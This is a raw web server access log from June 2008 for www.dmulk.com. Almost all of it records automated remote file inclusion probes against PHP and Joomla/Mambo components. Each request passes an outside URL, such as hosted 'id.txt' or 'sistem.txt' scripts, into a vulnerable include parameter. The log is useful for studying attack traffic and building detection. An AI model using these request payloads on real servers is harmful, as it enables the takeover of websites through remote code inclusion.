70.86.5.10 - - [08/Jun/2008:10:40:17 -0700] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:10:40:17 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
87.230.10.251 - - [08/Jun/2008:10:40:28 -0700] "GET /logs/db.php?path_local=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Jun/2008:10:40:29 -0700] "GET /db.php?path_local=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:10:40:31 -0700] "GET /logs/access_080513.log//22_ultimate/templates/header.php?mainpath=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:10:40:32 -0700] "GET //22_ultimate/templates/header.php?mainpath=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:10:40:32 -0700] "GET /logs//22_ultimate/templates/header.php?mainpath=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:41:14 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.246.185.183 - - [08/Jun/2008:10:41:55 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/cilux_kuclux/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.246.185.183 - - [08/Jun/2008:10:41:55 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/cilux_kuclux/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:10:42:14 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:10:42:14 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:10:42:14 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:10:42:32 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:10:42:34 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.patrioticusa.us/poll/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:10:42:45 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.137.18 - - [08/Jun/2008:10:43:13 -0700] "GET /logs/access_080118.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.trobur.no/media/bbs?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.137.18 - - [08/Jun/2008:10:43:14 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.trobur.no/media/bbs?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.126.108.198 - - [08/Jun/2008:10:43:17 -0700] "GET /logs//include.php?path[docroot]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [08/Jun/2008:10:43:18 -0700] "GET //include.php?path[docroot]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:43:20 -0700] "GET /logs/access_080401.log/index.php?Load=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:43:20 -0700] "GET /logs/access_080401.log/index.php?Load=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:43:23 -0700] "GET /index.php?Load=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 200 16819 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:43:23 -0700] "GET /index.php?Load=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 200 16803 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:43:24 -0700] "GET /logs/index.php?Load=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:43:24 -0700] "GET /logs/index.php?Load=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.126.108.198 - - [08/Jun/2008:10:43:42 -0700] "GET /logs//include.php?path[docroot]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [08/Jun/2008:10:43:42 -0700] "GET //include.php?path[docroot]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.241.242 - - [08/Jun/2008:10:43:49 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Zola-Hacker??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [08/Jun/2008:10:43:49 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Zola-Hacker??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:10:43:51 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:10:43:51 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:10:43:52 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:10:44:18 -0700] "GET /logs/access_080228.log/dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:10:44:21 -0700] "GET /dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:10:44:25 -0700] "GET /logs/dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:10:44:26 -0700] "GET /logs/access_080228.log/dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:10:44:26 -0700] "GET //skin/zero_vote/error.php?dir=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:10:44:29 -0700] "GET /dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:10:44:32 -0700] "GET /logs/dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:10:44:35 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:10:44:35 -0700] "GET //skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:10:44:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:44:52 -0700] "GET /logs/access_080505.log/index.php?Load=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:44:54 -0700] "GET /logs/access_080505.log/index.php?Load=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
151.11.24.250 - - [08/Jun/2008:10:44:55 -0700] "GET /logs/access_080120.log/?mosConfig_absolute_path=http://www.emilylamont.com/components/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [08/Jun/2008:10:44:57 -0700] "GET /?mosConfig_absolute_path=http://www.emilylamont.com/components/includes/id.txt??? HTTP/1.1" 200 16875 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [08/Jun/2008:10:45:03 -0700] "GET /logs/?mosConfig_absolute_path=http://www.emilylamont.com/components/includes/id.txt??? HTTP/1.1" 200 50988 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Jun/2008:10:45:19 -0700] "GET /logs/access_071224.log//admin/index.php?o=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.111.11.7 - - [08/Jun/2008:10:45:31 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:10:45:33 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.240.146 - - [08/Jun/2008:10:45:39 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.111.11.7 - - [08/Jun/2008:10:45:40 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [08/Jun/2008:10:45:52 -0700] "GET /logs//language.inc.php?langs_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [08/Jun/2008:10:45:52 -0700] "GET /logs/access.log/index.php?pagina=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [08/Jun/2008:10:45:52 -0700] "GET //language.inc.php?langs_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:46:27 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:10:46:29 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:10:47:00 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:47:00 -0700] "GET /config.php?path_to_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:10:47:02 -0700] "GET /logs/access_080218.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:10:47:02 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:10:47:02 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:47:32 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.98.2 - - [08/Jun/2008:10:47:36 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.musicampus.net/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.98.2 - - [08/Jun/2008:10:47:36 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.musicampus.net/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.98.2 - - [08/Jun/2008:10:47:38 -0700] "GET //index.php?option=com_custompages&cpage=http://www.musicampus.net/r0x.txt??? HTTP/1.1" 200 16881 "-" "libwww-perl/5.811" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:47:43 -0700] "GET /logs/db.php?path_local=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:47:43 -0700] "GET /db.php?path_local=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:10:47:54 -0700] "GET /logs/access_071225.log//oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.98.98.2 - - [08/Jun/2008:10:48:10 -0700] "GET /logs/access_080331.log//index.php?option=com_custompages&cpage=http://www.musicampus.net/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:48:25 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:48:25 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:48:25 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:48:38 -0700] "GET /logs/access_080122.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.67.119 - - [08/Jun/2008:10:48:43 -0700] "GET /mambelfish.class.php?mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:10:48:58 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:10:48:58 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:10:48:58 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.160.45 - - [08/Jun/2008:10:49:25 -0700] "GET /logs/access_080429.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:10:49:41 -0700] "GET /logs/access_080413.log/index2.php?showpage=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:10:49:44 -0700] "GET /index2.php?showpage=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:10:49:45 -0700] "GET /logs/index2.php?showpage=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:10:49:45 -0700] "GET /logs/access_080426.log/index2.php?showpage=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:10:49:57 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [08/Jun/2008:10:50:22 -0700] "GET /logs/access_080102.log/?mosConfig_absolute_path=http://www.emilylamont.com/components/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:10:50:27 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.194.149.215 - - [08/Jun/2008:10:51:10 -0700] "GET /logs/access_080219.log/index.php?option=com_mosmedia&Itemid=&mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [08/Jun/2008:10:51:10 -0700] "GET /logs/index.php?option=com_mosmedia&Itemid=&mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [08/Jun/2008:10:51:12 -0700] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 200 16927 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [08/Jun/2008:10:51:12 -0700] "GET /logs/access_080124.log/index.php?option=com_mosmedia&Itemid=&mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.137.18 - - [08/Jun/2008:10:51:26 -0700] "GET /logs/access_080312.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.trobur.no/media/bbs?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:10:51:28 -0700] "GET /logs/access_080117.log/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:10:51:29 -0700] "GET /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:10:51:29 -0700] "GET /logs/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:51:48 -0700] "GET /logs/access.log/index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:51:51 -0700] "GET /index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 200 16853 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:51:57 -0700] "GET /logs/index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:10:52:27 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.111.11.7 - - [08/Jun/2008:10:52:38 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.215 - - [08/Jun/2008:10:52:47 -0700] "GET /logs/access_080131.log/index.php?option=com_mosmedia&Itemid=&mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:10:53:11 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:10:53:13 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:54:23 -0700] "GET /logs/access_080312.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:54:23 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:54:23 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:54:43 -0700] "GET /logs/access_080312.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:54:44 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:54:44 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:10:54:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:10:54:48 -0700] "GET //skin/zero_vote/error.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:10:54:52 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:10:54:53 -0700] "GET //include/bbs.lib.inc.php?site_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:10:54:53 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:54:54 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:10:54:57 -0700] "GET /logs/access_080106.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.224.129.124 - - [08/Jun/2008:10:54:58 -0700] "GET //language.inc.php?langs_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.36 - - [08/Jun/2008:10:55:04 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:55:21 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
